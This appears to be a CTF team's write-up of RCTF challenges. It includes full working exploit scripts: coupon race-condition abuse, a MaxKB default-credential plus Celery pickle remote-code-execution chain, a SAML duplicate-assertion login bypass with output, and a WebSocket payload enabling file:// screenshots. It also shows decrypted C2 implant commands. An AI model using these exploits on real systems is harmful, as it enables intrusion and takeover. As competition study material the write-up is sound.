Coupon coupon = this.couponService.getCouponById(orderRequest.getCouponId());
discountAmount = coupon.getDiscountAmount();
couponId = coupon.getId();
}
BigDecimal unitPrice = product.getPrice();
BigDecimal quantity = new BigDecimal(orderRequest.getQuantity());
/* ... */
if (couponId != null &&
!this.couponService.useCoupon(couponId))
throw new RuntimeException("Failed to use coupon");
Order order = new Order(userId, orderRequest.getProductId(), quantityNum, originalPrice);
/* ... */
this.orderMapper.updateStatus(order.getId(), "COMPLETED");
/* ... */
} catch (Exception e) {
/* ... */
}
}
```
If we use a coupon, buying an item will not cost anything. By subsequently refunding the order using `/api/order/refund`, we can get the coupon back. By repeating this for every product, we can purchase every product without paying with a coupon or money.
```python!
import requests
import random
import time
from concurrent.futures import ThreadPoolExecutor, wait, FIRST_COMPLETED
URL = "http://61.147.171.35:60502/"
s = requests.session()
user = {
"username": random.randbytes(8).hex(),
"email": random.randbytes(8).hex() + "@a.com",
"password": "password"
}
print(user)
r = s.post(URL + "api/user/register", json=user)
r = s.post(URL + "api/user/login", json=user)
s.headers["Authorization"] = f"Bearer {r.json()["data"]["token"]}"
r = s.get(URL + "api/product/list")
products = r.json()["data"]
def delay(s, product, coupon):
start = time.time()
r = s.post(URL + "api/order/create", json={
"productId": product["id"],
"quantity": "1e9999999",
"couponId": coupon["id"]
})
print(r.text, flush=True)
print(time.time()-start, flush=True)
def race(s, product, coupon):
r = s.post(URL + "api/order/create", json={
"productId": product["id"],
"quantity": "1",
"couponId": coupon["id"]
})
print(r.text, flush=True)
for i, product in enumerate(products):
print("CURRENT:", i)
while True:
r = s.get(URL + "api/coupon/available")
coupon = r.json()["data"][0]
with ThreadPoolExecutor(max_workers=30) as ex:
t0 = ex.submit(delay,s, product, coupon)
time.sleep(3.5)
t1 = ex.submit(race, s, product, coupon)
done, not_done = wait([t0, t1])
r = s.get(URL + "api/order/my")
orders = r.json()["data"]
print(orders)
completed_orders = [order for order in orders if order["status"] == "COMPLETED"]
if len(completed_orders) == 2 + i:
for order in completed_orders:
if product["id"] == order["productId"]:
r = s.post(URL + f"api/order/refund/{order['id']}")
break
break
for order in completed_orders:
if product["id"] == order["productId"]:
r = s.post(URL + f"api/order/refund/{order['id']}")
print("===================================================")
r = s.get(URL + "api/flag/get")
print(r.text)
```
## RootKB--
MaxKB exposes a “Tool Debug” API that runs arbitrary Python inside the application container. The debug executor normally runs as the low-privilege sandbox user but it still lets an authenticated attacker run arbitrary Python in the app container.
- Celery is configured to use Redis with static credentials and to **accept and emit pickle-serialized tasks**. Tasks such as `celery:embedding_by_paragraph` are registered and consume pickle payloads.
- Default admin credentials are shipped (`apps/users/views/user.py:33`), so an attacker can log in, hit the debug endpoint, and from there publish an arbitrary pickle object into the broker. The Celery worker unpickles it and executes attacker-controlled code. The worker in the provided deployment runs as root, so the pickle gadget executes as root.
```python
#!/usr/bin/env python3
import json
import sys
import textwrap
from urllib.parse import urljoin
import requests
import time
BASE = "http://web-rootkb-minusminus-2348f933656a.rctf.rois.team/"
BASE = BASE.rstrip('/') + '/'
ADMIN = urljoin(BASE, 'admin/api/')
WORKSPACE = 'default'
session = requests.Session()
def api(path):
return urljoin(ADMIN, path)
def expect(resp, step):
try:
data = resp.json()
except Exception:
raise RuntimeError(f"{step}: unexpected response {resp.status_code} {resp.text}")
if data.get('code') != 200:
raise RuntimeError(f"{step} failed: {data}")
return data.get('data')
def login():
body = {"username": "admin", "password": "MaxKB@123.."}
data = expect(session.post(api('user/login'), json=body), 'login')
token = data['token']
session.headers.update({'Authorization': f'Bearer {token}'})
return token
def tool_debug(code):
payload = {
"input_field_list": [],
"debug_field_list": [],
"init_field_list": [],
"init_params": {},
"code": textwrap.dedent(code)
}
return expect(session.post(api(f'workspace/{WORKSPACE}/tool/debug'), json=payload), 'tool debug')
def main():
login()
celery_rce = r"""
class Payload:
def __reduce__(self):
import os
return (os.system,("RCE",))
def exploit():
from celery import Celery
import redis, time
app = Celery(broker='redis://:Password123@redis@127.0.0.1:6379/0')
result = app.send_task('celery:embedding_by_paragraph', args=(Payload(), Payload()), serializer='pickle')
task_id = getattr(result, 'id', None)
return {'task_id': task_id}
"""
rce = tool_debug(celery_rce)
if __name__ == '__main__':
main()
```
## auth
You could bypass the userType by setting type to 0x10, then logout then login again to set userType to 0.
To bypass the nameid check, you could duplicate the `<saml:Assertion>` tag in the saml response. If you change its id, it will validate the other one but use the first tag
```python=
import requests
import base64
import re
import os
import uuid
from lxml import etree
from bs4 import BeautifulSoup
# --- Configuration ---
IDP_URL = 'http://auth.rctf.rois.team'
SP_URL = 'http://auth-flag.rctf.rois.team:26000'
IDP_REGISTER_URL = f"{IDP_URL}/register"
IDP_LOGIN_URL = f"{IDP_URL}/login"
IDP_LOGOUT_URL = f"{IDP_URL}/logout"
IDP_SAML_URL = f"{IDP_URL}/saml/idp/Flag"
SP_ACS_URL = f"{SP_URL}/saml/acs"
SP_FLAG_URL = f"{SP_URL}/admin"
# Target email from sp-flag/app.py
TARGET_EMAIL = 'admin@rois.team'
# Vulnerability details from hint
PRIV_ESC_TYPE = '0x10'
# Namespace map for lxml
NS = {
'samlp': 'urn:oasis:names:tc:SAML:2.0:protocol',
'saml': 'urn:oasis:names:tc:SAML:2.0:assertion',
'ds': 'http://www.w3.org/2000/09/xmldsig#'
}
# Use one session for the whole IdP interaction
session = requests.Session()
def generate_user():
"""Generates random user credentials"""
rand_id = uuid.uuid4().hex[:10]
username = f"ctf_user_{rand_id}"
email = f"{username}@example.com"
password = uuid.uuid4().hex
print(f"[+] Generated attacker creds:\n User: {username}\n Pass: {password}")
return username, email, password
def register_and_escalate(username, email, password):
"""
Registers a new user, manipulating the 'type' field to 0x10.
Then logs out and logs back in to trigger the privilege escalation.
"""
print(f"[+] Registering new user '{username}' with type {PRIV_ESC_TYPE}...")
reg_data = {
'type': PRIV_ESC_TYPE,
'invitationCode': '',
'username': username,
'email': email,
'password': password,
'confirmPassword': password,
'displayName': username,
'department': 'Exploit'
}
try:
# Register the user
r = session.post(IDP_REGISTER_URL, data=reg_data, timeout=10)
if r.status_code != 200 or 'portal' not in r.url:
print(f"[-] Registration failed. Response:")
print(r.text[:500])
return False
print("[+] Registration successful. User session created with manipulated type.")
# Logout, as per hint
print("[+] Logging out...")
session.get(IDP_LOGOUT_URL, timeout=10)
# Login again to trigger the bug
print(f"[+] Logging back in as '{username}' to get escalated session...")
login_data = {'username': username, 'password': password}
r = session.post(IDP_LOGIN_URL, data=login_data, timeout=10)
if r.status_code != 200 or 'portal' not in r.url:
print(f"[-] Login failed. Response:")
print(r.text[:500])
return False
print("[+] Login successful. Session should now be 'Type 0'.")
return True
except requests.exceptions.RequestException as e:
print(f"[-] Error during IdP escalation: {e}")
return False
def get_legit_saml_response():
"""
Uses the escalated session to get a valid SAML response.
"""
print(f"[+] Fetching SAML auto-submit page with escalated session...")
try:
r = session.get(IDP_SAML_URL, timeout=10)
if "You do not have permission to access this service" in r.text:
print(f"[-] Error: Privilege escalation failed. Session is not Type 0.")
print(f"[-] The 'type={PRIV_ESC_TYPE} -> logout -> login' hint did not work.")
return None, None, None
# Parse the auto-submit form
soup = BeautifulSoup(r.text, 'html.parser')
form = soup.find('form', {'id': 'samlForm'})
if not form:
print("[-] Could not find SAML form. Escalation may have failed.")
print(r.text[:500])
return None, None, None
saml_response_b64 = form.find('input', {'name': 'SAMLResponse'})['value']
# --- THIS IS THE FIX ---
# Handle the case where RelayState is not present
relay_state_input = form.find('input', {'name': 'RelayState'})
relay_state = relay_state_input['value'] if relay_state_input else ""
# --- END FIX ---
acs_url = form['action']
print(f"[+] Got valid SAMLResponse for our escalated user.")
return saml_response_b64, relay_state, acs_url
except requests.exceptions.RequestException as e:
print(f"[-] Error connecting to IdP: {e}")
return None, None, None
def create_hacked_saml_response(saml_response_b64):
"""
Decodes the SAMLResponse, injects a fake admin assertion,
and re-encodes it.
"""
print(f"[+] Decoding original SAMLResponse...")
try:
saml_xml = base64.b64decode(saml_response_b64).decode()
except Exception as e:
print(f"[-] Failed to decode Base64: {e}")
return None
# Parse the XML
parser = etree.XMLParser(remove_blank_text=True)
root = etree.fromstring(saml_xml.encode('utf-8'), parser)
# Find the original, legitimate assertion
legit_assertion = root.find('.//saml:Assertion', namespaces=NS)
if legit_assertion is None:
print("[-] Error: Could not find <saml:Assertion> tag in response.")
return None
print(f"[+] Found legitimate assertion. Cloning and modifying...")
# Create the fake assertion by deep copying the legit one
fake_assertion = etree.fromstring(etree.tostring(legit_assertion))
# 1. Change the ID to be unique (as per the vulnerability)
original_id = legit_assertion.get('ID')
fake_id = f"_{uuid.uuid4().hex}"
fake_assertion.set('ID', fake_id)
# 2. Change the NameID to the target email
name_id_tag = fake_assertion.find('.//saml:NameID', namespaces=NS)
if name_id_tag is None:
print("[-] Error: Could not find <saml:NameID> tag.")
return None
name_id_tag.text = TARGET_EMAIL
# 3. Remove the Signature from the fake assertion
signature_tag = fake_assertion.find('.//ds:Signature', namespaces=NS)
if signature_tag is not None:
fake_assertion.remove(signature_tag)
else:
print("[-] Warning: Legit assertion was not signed? Proceeding anyway.")
# 4. Insert the fake assertion *before* the legitimate one
parent = legit_assertion.getparent()
parent.insert(parent.index(legit_assertion), fake_assertion)
print(f"[+] Injected fake assertion with NameID '{TARGET_EMAIL}' and ID '{fake_id}'.")
# Re-encode to string and then Base64
hacked_xml_bytes = etree.tostring(root)
hacked_saml_b64 = base64.b64encode(hacked_xml_bytes).decode()
return hacked_saml_b64
def get_flag(hacked_saml_b64, relay_state, acs_url):
"""
Sends the modified SAMLResponse to the SP and
retrieves the flag.
"""
print(f"[+] Sending hacked SAMLResponse to SP at {acs_url}...")
# Use a new session for the SP
sp_session = requests.Session()
post_data = {
'SAMLResponse': hacked_saml_b64,
'RelayState': relay_state
}
try:
# Send the payload. allow_redirects=True will follow to /admin
r = sp_session.post(acs_url, data=post_data, allow_redirects=True, timeout=10)
if r.url != SP_FLAG_URL:
print(f"[-] Exploit failed. Was redirected to {r.url} instead of admin page.")
print("[-] Response content (first 500 chars):\n", r.text[:500])
return
print(f"[+] Successfully authenticated to SP as admin!")
print(f"[+] Flag found:")
# Extract flag from response
flag_match = re.search(r'RCTF{.*}', r.text)
if flag_match:
print(f"\n{flag_match.group(0)}\n")
else:
print(r.text)
except requests.exceptions.RequestException as e:
print(f"[-] Error connecting to SP: {e}")
def main():
# 1. Generate new user creds
username, email, password = generate_user()
# 2. Perform IdP privilege escalation
if not register_and_escalate(username, email, password):
print("[-] Aborting exploit.")
return
# 3. Get a valid SAML response using our escalated session
saml_b64, relay_state, acs_url = get_legit_saml_response()
if not saml_b64:
print("[-] Aborting exploit.")
return
# 4. Modify the SAML response to inject our fake admin assertion
hacked_saml_b64 = create_hacked_saml_response(saml_b64)
if not hacked_saml_b64:
print("[-] Aborting exploit.")
return
# 5. Send the hacked response to the SP to get the flag
get_flag(hacked_saml_b64, relay_state, acs_url)
if __name__ == "__main__":
main()
```
```sh
❯ python solve.py
[+] Generated attacker creds:
User: ctf_user_c4892a4bce
Pass: 5105a241d2484da48675f8f284568998
[+] Registering new user 'ctf_user_c4892a4bce' with type 0x10...
[+] Registration successful. User session created with manipulated type.
[+] Logging out...
[+] Logging back in as 'ctf_user_c4892a4bce' to get escalated session...
[+] Login successful. Session should now be 'Type 0'.
[+] Fetching SAML auto-submit page with escalated session...
[+] Got valid SAMLResponse for our escalated user.
[+] Decoding original SAMLResponse...
[+] Found legitimate assertion. Cloning and modifying...
[+] Injected fake assertion with NameID 'admin@rois.team' and ID '_c1ebbbeae8b0456cab6c5b4117ebeb96'.
[+] Sending hacked SAMLResponse to SP at http://auth-flag.rctf.rois.team:26000/saml/acs...
[+] Successfully authenticated to SP as admin!
[+] Flag found:
RCTF{4re_you_really_an_administrator??!!}
```
Flag: `RCTF{4re_you_really_an_administrator??!!}`
# Misc
## Signin
http://1.14.196.78/?score=100

## Speak Softly Love
https://chatgpt.com/share/69186b19-aeb4-8004-a900-858d16e8be87
Challenge 1: `ID: 8ssDGBTssUI`
Challenge 2: `r178 | mv_fox | 2016-05-09 00:21:38 +0700 (Mon, 09 May 2016) | 1 line if too many 'soft' errors occur in a row, dosmid aborts (protects against 'soft errors loops', typically with playlist filled with non-existing files)`
Challenge 3: https://mateusz.viste.fr/mateusz.ogg
Challenge 4: https://gopherproxy.meulie.net/gopher.viste.fr/1/donate/ -> `My bitcoin address: 16TofYbGd86C7S6JuAuhGkX4fbmC9QtzwT`
## Wanna Feel Love
We get an eml as handout. I used https://www.emlreader.com/ to open the eml file. We get a big text and an xm file as handout. My teammate recognized that the text is spammic. So I used https://spammimic.com/decode.cgi to decode the text:

This reveals the answer for the first question. I then asked chatgpt how I can open the xm file. It gave me [MilkyTracker](https://github.com/milkytracker/MilkyTracker). So I downloaded and used it. When opening the xm file inside MilkyTracker, we can read a comment: `Can anybody extract the urban legend information about ‘Feel’ from this XM file?`.
My teammate also sent the comment but a longer version: `Can anybody extract the urban legend information about ‘Feel’ from this XM file? They say if you trace the peaks carefully enough, it spells a sentence that was never meant to be heard.`
So inside MilkyTracker I checked all instructions and at instruction 3 I could export a sample called Feel. So I exported it as a wav file:

From this point I tried different things like checking the spectogram etc.. Based on the text in the comment it talked about high peaks. So I asked chatgpt to make a script to make all high peaks 1 and the rest 0. This revealed a text.
```python
#!/usr/bin/env python3
import numpy as np
import scipy.io.wavfile as wav
import math
# --- 1. Read WAV -------------------------------------------------------------
rate, data = wav.read("Feel.wav") # <-- put your path here
print(f"Sample rate: {rate}, samples: {len(data)}")
# If stereo, convert to mono
if len(data.shape) > 1:
data = data.mean(axis=1).astype(data.dtype)
# --- 2. Find “high peaks” ----------------------------------------------------
THRESH = 16000 # adjust if needed
peak_idx = np.where(np.abs(data) > THRESH)[0]
print(f"Number of peak samples: {len(peak_idx)}")
# --- 3. Group peaks into pulses & find unit length --------------------------
# Start of each pulse = first index of each cluster of peaks
starts = []
last = -10**9
MIN_SEP = 100 # min separation between clusters (in samples)
for i in peak_idx:
if i - last > MIN_SEP:
starts.append(i)
last = i
starts = np.array(starts)
print(f"Number of pulses: {len(starts)}")
# Gaps between pulses
gaps = np.diff(starts)
# Find gcd of all gaps -> base time unit
unit = gaps[0]
for g in gaps[1:]:
unit = math.gcd(unit, int(g))
print(f"GCD unit (samples): {unit}")
# --- 4. Slice the whole signal into unit-sized chunks -----------------------
n_units = len(data) // unit
print(f"Number of units: {n_units}")
bits = []
peak_iter = iter(peak_idx)
current_peak = next(peak_iter, None)
for i in range(n_units):
start = i * unit
end = start + unit
bit = 0
# Skip peaks that are before this window
while current_peak is not None and current_peak < start:
current_peak = next(peak_iter, None)
# If there is a peak in this window -> 1
if current_peak is not None and start <= current_peak < end:
bit = 1
bits.append(str(bit))
bitstring = "".join(bits)
print("Bitstring length:", len(bitstring))
print("First 64 bits:", bitstring[:64])
# --- 5. Decode as ASCII ------------------------------------------------------
chars = []
for i in range(0, len(bitstring), 8):
byte = bitstring[i:i+8]
if len(byte) < 8:
break
val = int(byte, 2)
chars.append(chr(val))
decoded = "".join(chars)
print("Decoded text:")
print(decoded)
```

This was the answer for the second question. My teammate used chatgpt to answer the third question:
Here is the information for Challenge 3:
* **Video Id:** `rLy-AwdCOmI` ([Wayback Machine][1])
* **Upload Date:** **2009-04-15** ([Internet Archive][2])
* **Uploader:** **Creepyblog** ([Wayback Machine][3])
[1]: https://web.archive.org/web/20220524020000/https%3A//www.youtube.com/watch?v=rLy-AwdCOmI "I Feel Fantastic - YouTube"
[2]: https://archive.org/details/youtube-rLy-AwdCOmI?utm_source=chatgpt.com "I Feel Fantastic : Creepyblog : Free Download, Borrow, and ..."
[3]: https://web.archive.org/web/20160618000736/https%3A//www.blumhouse.com/2016/04/12/i-feel-fantastic-the-horrifying-history-of-tara-the-android "“I Feel Fantastic” — The Horrifying History of Tara the Android – Blumhouse.com"
For the 4th question I asked chatgpt and it gave me the correct site and year of creation. However, it said that the sender was John Bergeron but this didn't work. I tried AndroidWorld too, that also didn't work. Then I checked who the owner was of the site and it was Chris Willis. This also didn't work. Asking the admins, he said to try it in a different browser. It did work in a different browser.
For the last question, I asked chatgpt. It found some old website of John, but that wasn't correct. So I said look for like a digital grave stuff. I tried a different URL and this one worked: `https://www.findagrave.com/memorial/63520325/john-louis-bergeron`.
Challenge 1: `Don't just listen to the sound; this file is hiding an 'old relic.' Try looking for the 'comments' that the player isn't supposed to see.`
Challenge 2: `I Feel Fantastic heyheyhey`
Challenge 3: `rLy-AwdCOmI | 2009-04-15 | Creepyblog `
Challenge 4: `http://www.androidworld.com/prod68.htm | Chris Willis | 2004`
Challenge 5: `https://www.findagrave.com/memorial/63520325/john-louis-bergeron`
## Shadows of Asgard
https://chatgpt.com/share/69185a02-5ae8-8004-8a49-12fa5f9cb07b
Challenge 1:
```
print(extract_html_snippet(indices_tech[2], radius=120))
"></i> 服务热线:400-888-8888</p>
<p><i class="fas fa-envelope"></i> 邮箱:contact@yuanhengtech.com</p>
</div>
<div class="footer-section">
<h4>快速链接
```
Answer: `渊恒科技`
Challenge 2:
```
sysinfo = obj['systemInfo']
sysinfo.keys(), sysinfo
(dict_keys(['hostname', 'username', 'osType', 'osRelease', 'platform', 'arch', 'PID', 'Process', 'IP', 'mode']),
{'hostname': 'DESKTOP-EO5QI9P',
'username': 'dell',
'osType': 'Windows_NT',
'osRelease': '10.0.17763',
'platform': 'win32',
'arch': 'x64',
'PID': 6796,
'Process': 'C:\\Users\\dell\\Desktop\\Microsoft VS Code\\Code.exe',
'IP': ['192.168.77.134'],
'mode': 'egress'})
```
`C:\\Users\\dell\\Desktop\\Microsoft VS Code\\Code.exe`
Challenge 3:
```
def decrypt_hex_b64_str(b64s):
raw = base64.b64decode(b64s)
hexstr = raw.decode()
cipher_bytes = bytes.fromhex(hexstr)
cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
pt = cipher.decrypt(cipher_bytes)
# try PKCS7 unpad
last = pt[-1]
if 1 <= last <= 16 and all(b==last for b in pt[-last:]):
pt = pt[:-last]
return pt
for s in sorted(unknown_b64s, key=len):
pt = decrypt_hex_b64_str(s)
print("==== len b64", len(s))
try:
print(pt.decode())
except Exception:
print(pt)
print()
==== len b64 216
{"command":"pwd","outputChannel":"o-1xk645wxtri","taskId":"c0c6125e"}
==== len b64 216
{"command":"ls","outputChannel":"o-zgq4608uhw","taskId":"2b414ac4"}
==== len b64 216
{"command":"drives","outputChannel":"o-wup8k5bgwft","taskId":"4471e3a8"}
==== len b64 256
{"command":"pwd","outputChannel":"o-22kvm6xuz94i","taskId":"shell-init-pwd-1763017713334"}
==== len b64 256
{"command":"spawn ipconfig","outputChannel":"o-wdew5tl006b","taskId":"e95ae050"}
==== len b64 384
{"command":"ls \"C:\\\\Users\\\\dell\\\\Desktop\\\\Microsoft VS Code\"","outputChannel":"o-gfe3q56f5x9","taskId":"shell-ls-1763017724808"}
==== len b64 728
{"outputChannel":"o-2ggeq7qpt2u","taskId":"shell-upload-1763017722153","fileId":"dd45c631-ec19-40b1-aa1b-e3dea35d21ae","filePath":"C:\\Users\\dell\\Desktop\\Microsoft VS Code\\fllllag.txt","fileData":"UkNURnt0aGV5IGFsd2F5cyBzYXkgUmF2ZW4gaXMgaW5hdXNwaWNpb3VzfQ=="}
```
Answer: `c0c6125e`
Challenge 4:
```
Drive: C:
Created: Fri Sep 14 2018 23:09:26 GMT-0700 (Pacific Daylight Time)
Modified: Wed Nov 12 2025 22:52:43 GMT-0800 (Pacific Standard Time)
---
```
Answer `2018-09-14 23:09:26`
Challenge 5:
```
filedata_b64 = j11["fileData"]
file_bytes = base64.b64decode(filedata_b64)
file_bytes, len(file_bytes), file_bytes.decode('utf-8')
(b'RCTF{they always say Raven is inauspicious}',
43,
'RCTF{they always say Raven is inauspicious}')
```
Answer: `RCTF{they always say Raven is inauspicious}`
Final flag: `RCTF{Wh3n_Th3_R4v3n_S1ngs_4sg4rd_F4lls_S1l3nt}`
## The Alchemist's Cage

## 514
Discord bot has a function to visit a website and then take screenshot, by checking `http://localhost:5140`, the server is running without auth so we can use websocket to connect and then add screenshot path with "file://"
Also to leak the id of the plugins we can connect to `ws://ip:port/status` to retrieve or the information of the bot
```html
<!doctype html>
<meta charset="utf-8">
<title>Patch screenshot protocols (lsan28)</title>
<style>
body { margin:8px; font-family:monospace; font-size:12px; background:#111; color:#eee; }
pre { margin:0; background:#000; padding:8px; border:1px solid #444; height:80vh; overflow:auto; white-space:pre-wrap; word-break:break-word; }
</style>
<pre id="log">Connecting…</pre>
<script>
const logEl=document.getElementById('log');
const log=m=>{logEl.textContent+=m+'\n'; logEl.scrollTop=logEl.scrollHeight;};
const ws=new WebSocket('ws://127.0.0.1:5140/status');
function rid(){return Math.random().toString(36).slice(2,10);}
const ident = 'screenshot:lsan28';
ws.onopen=()=>{
log('WS open. Waiting for config to display current protocols...');
};
function patch(){
log('Sending manager/reload for '+ident);
const msg = { id: rid(), type: 'manager/reload', args: ['', ident, { protocols: ['http','https','file'] }] };
ws.send(JSON.stringify(msg));
}
ws.onmessage=ev=>{
try{
const msg=JSON.parse(ev.data);
if(msg.type==='data' && msg.body?.key==='config'){
const cfg = msg.body.value?.plugins || {};
const shot = cfg['screenshot:lsan28'] || cfg['screenshot'] || {};
log('Current protocols: '+JSON.stringify(shot.protocols || shot.config?.protocols));
// patch once after first config seen
patch();
} else if(msg.type==='response' && msg.body){
log('RESP '+JSON.stringify(msg.body));
}
}catch(e){ log('parse error '+e); }
};
ws.onerror=e=>log('WS error '+(e.message||e));
</script>
```
Send both `shot <attacker website>` and `shot file:///flag.txt` to get flag

## Asgard Fallen Down
https://chatgpt.com/share/6919c5a6-7418-8004-91e7-63b3881c0ea4
Challenge 1:
```py
def decrypt_build(b64_payload):
# first B64 decode: yields ascii of a second base64 string
level1 = base64.b64decode(b64_payload)
# the rest may contain newlines, remove whitespace
s1 = level1.decode().strip()
# second base64 decode
level2 = base64.b64decode(s1)
hex_str = level2.decode().strip()
cipher_bytes = bytes.fromhex(hex_str)
cipher = AES.new(key, AES.MODE_CBC, iv)
pt = cipher.decrypt(cipher_bytes)
pad_len = pt[-1]
if 1 <= pad_len <= 16 and pt.endswith(bytes([pad_len])*pad_len):
pt = pt[:-pad_len]
return pt
for i,b64 in enumerate(unique_build):
pt = decrypt_build(b64)
print("Command idx", i, "len", len(pt))
try:
print(pt.decode())
except Exception:
print(pt[:64])
print("-----")
Command idx 0 len 78
{"command":"spawn whoami","outputChannel":"o-27kgboxah4l","taskId":"71c17c09"}
-----
Command idx 1 len 69
{"command":"pwd","outputChannel":"o-7px87l7ja52","taskId":"ca8864bf"}
-----
Command idx 2 len 71
{"command":"cd ..","outputChannel":"o-8hpo9uozrus","taskId":"476f8331"}
-----
Command idx 3 len 68
{"command":"env","outputChannel":"o-lbgp59stp4","taskId":"e7f2ddd1"}
-----
Command idx 4 len 89
{"command":"scan 127.0.0.1 -p80,445","outputChannel":"o-57dl7fujisl","taskId":"a2b60122"}
-----
```
`spawn whoami`
Challenge 2:
```
index_times_sorted = sorted(index_times)
index_times_sorted, [index_times_sorted[i+1]-index_times_sorted[i] for i in range(len(index_times_sorted)-1)]
([1763185530.360991,
1763185538.018436,
1763185549.205252,
1763185560.558417,
1763185595.883718],
[7.657444953918457, 11.186815977096558, 11.35316514968872, 35.32530093193054])
Handling irregular GET request intervals
We see 5 ‘GET /index.html’ requests with varying intervals: 7.7s, 11.2s, 11.4s, and 35.3s. The last one stands out but likely comes from a mix of scanning and agent behavior. The key next step is to group times by client IP and port to isolate Loki’s agent and focus on heartbeat intervals for one specific connection.
```
Guessed `10` lol
Challenge 3:
```
for k in env_dict:
if "PROCESSOR" in k:
print(k, "=", env_dict[k])
NUMBER_OF_PROCESSORS = 2
PROCESSOR_ARCHITECTURE = AMD64
PROCESSOR_IDENTIFIER = Intel64 Family 6 Model 191 Stepping 2, GenuineIntel
PROCESSOR_LEVEL = 6
PROCESSOR_REVISION = bf02
```
Processor model is in env which is `Intel64 Family 6 Model 191 Stepping 2, GenuineIntel`
Challenge 4:

Answer is https://github.com/TideSec/TscanPlus which means `TscanPlus`
Final flag: `RCTF{Wh1l3_Th0r_Struck_L1ghtn1ng_L0k1_St0l3_Th3_Thr0n3}`
# Reverse
## Chaos
由于比赛平台分数榜计算问题,我们决定将Reverse方向【chaos】重新开放作为签到,并放出对应的Flag:RCTF{AntiDbg_KeyM0d_2025_R3v3rs3}
Due to an issue with score calculation on the competition platform, we have decided to reopen the Reverse challenge 【chaos】 as a check-in challenge and release the corresponding flag:RCTF{AntiDbg_KeyM0d_2025_R3v3rs3}
## Chaos2
The program has some pretty basic obfuscation. There are 4 seperate checks that you need to pass, and each check will update a letter in an RC4 key. You can just break before it decrypts the string and update the key to be `flag:{ThisflagIsGoods}`
After doing that, continue the program and the flag will be printed to stdout.
`RCTF{AntiDbg_Reversing_2025_v2.0_Ch4llenge}`
## onion
Standard VM stuff, but the program was pretty large, so to analyze it I first lifted it to x86 by doing some cursed ass gcc shit:
```python=
import sys
import re
# Open the file specified in the command line, or default to "full_vmcode"
if len(sys.argv) > 1:
filename = sys.argv[1]
else:
filename = "full_vmcode"
try:
with open(filename, "rb") as f:
code = f.read()
except FileNotFoundError:
print(f"Error: File not found: '{filename}'")
sys.exit(1)
pc = 0
def rx(sz):
"""Reads 'sz' bytes from the code buffer and advances the global pc."""
global pc
# Check for end-of-file to avoid crashing on truncated instructions
if pc + sz > len(code):
print("\nWarning: Read past end-of-file.")
ret = code[pc:]
pc = len(code)
return ret
ret = code[pc : pc + sz]
pc += sz
return ret
def fix_additions(code):
PAT = re.compile(rb"\x84\x06\x84\x07(\x16\x06........|\x17\x06.)(\x17\x07.).{19}\x27\x07\x01\x17\x06\x07\x01..(?:\x2A\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF)?\x85\x07\x85\x06", re.MULTILINE | re.DOTALL)
def cb(m: re.Match[bytes]):
g1, g2 = m.group(1), m.group(2)
if g1[0] == 0x17:
ret = bytes([0x33, g2[2], g1[2]])
else:
ret = bytes([0x34, g2[2], *g1[2:]])
return ret.ljust(len(m.group(0)), b"\0")
return PAT.sub(cb, code)
# --- Operand Reader Functions ---
r64 = lambda: int.from_bytes(rx(8), 'little')
r32 = lambda: int.from_bytes(rx(4), 'little')
r16 = lambda: int.from_bytes(rx(2), 'little')
r8 = lambda: int.from_bytes(rx(1), 'little')
base_prog = []
functions = []
labeled = {}
next_is_mov = False
# fix additions
code = fix_additions(code)
while pc < len(code):
# while pc < 0x00B13:
current_addr = pc
op = r8()
if next_is_mov:
if op != 0x11 or r16() != 0xe000:
print(f"Found end of current @ {pc:#x}")
break
next_is_mov = False
pc -= 2
(functions and functions[-1].append or base_prog.append)(f"_{current_addr:06X}:")
match op:
case 0x00: # nop
(functions and functions[-1].append or base_prog.append)(f"nop")
case 0x01: # jmp
a = r16()
(functions and functions[-1].append or base_prog.append)(f"jmp _{a:06X}")
if a == pc:
next_is_mov = True
case 0x02: # jnz
a = r16()
(functions and functions[-1].append or base_prog.append)(f"jnz _{a:06X}")
case 0x03: # jz
a = r16()
(functions and functions[-1].append or base_prog.append)(f"jz _{a:06X}")
case 0x11: # case 17: mov ds, imm16
a = r16()
(functions and functions[-1].append or base_prog.append)(f"mov ds, {a:#x}")
case 0x12: # case 18: mov es, imm16
a = r16()
(functions and functions[-1].append or base_prog.append)(f"mov es, {a:#x}")
case 0x15: # case 21: mov R[u8], [ds]
a = r8()
(functions and functions[-1].append or base_prog.append)(f"mov R{a}, [ds]")
case 0x16: # case 22: mov R[u8], imm64
a = r8()
b = r64()
(functions and functions[-1].append or base_prog.append)(f"mov R{a}, {b:#x}")
case 0x17: # case 23: mov R[u8], R[u8]
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"mov R{a}, R{b}")
case 0x18: # case 24: mov R[u8], [ds + imm16]
a = r8()
b = r16()
(functions and functions[-1].append or base_prog.append)(f"mov R{a}, [ds + {b:#x}]")
case 0x19: # case 25: mov [ds], R[u8]
a = r8()
(functions and functions[-1].append or base_prog.append)(f"mov [ds], R{a}")
case 0x1A: # case 26: movzx R[u8], byte ptr [ds + R[u8]]
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"movzx R{a}, byte ptr [ds + R{b}]")
case 0x1B: # case 27: mov byte ptr [ds + R[u8]], R[u8]
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"mov byte ptr [ds + R{b}], R{a}b")
case 0x1C: # case 28: inc R[u8]
a = r8()
(functions and functions[-1].append or base_prog.append)(f"inc R{a}")
case 0x1D: # case 29: dec R[u8]
a = r8()
(functions and functions[-1].append or base_prog.append)(f"dec R{a}")
case 0x1E: # case 30: shr R[u8], imm8
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"shr R{a}, {b}")
case 0x1F: # case 31: add ds, R[u8]
a = r8()
(functions and functions[-1].append or base_prog.append)(f"add ds, R{a}")
case 0x25: # case 37: and R[u8], R[u8]
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"and R{a}, R{b}")
case 0x26: # case 38: xor R[u8], R[u8]
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"xor R{a}, R{b}")
case 0x27: # case 39: shl R[u8], imm8
a = r8()
b = r8()
(functions and functions[-1].append or base_prog.append)(f"shl R{a}, {b}")
case 0x29: # case 41: xor R[u8], imm64
a = r8()
b = r64()
(functions and functions[-1].append or base_prog.append)(f"movabs r10, {b:#x}")
(functions and functions[-1].append or base_prog.append)(f"xor R{a}, r10")
case 0x2A: # case 42: and R[u8], imm64
a = r8()
b = r64()
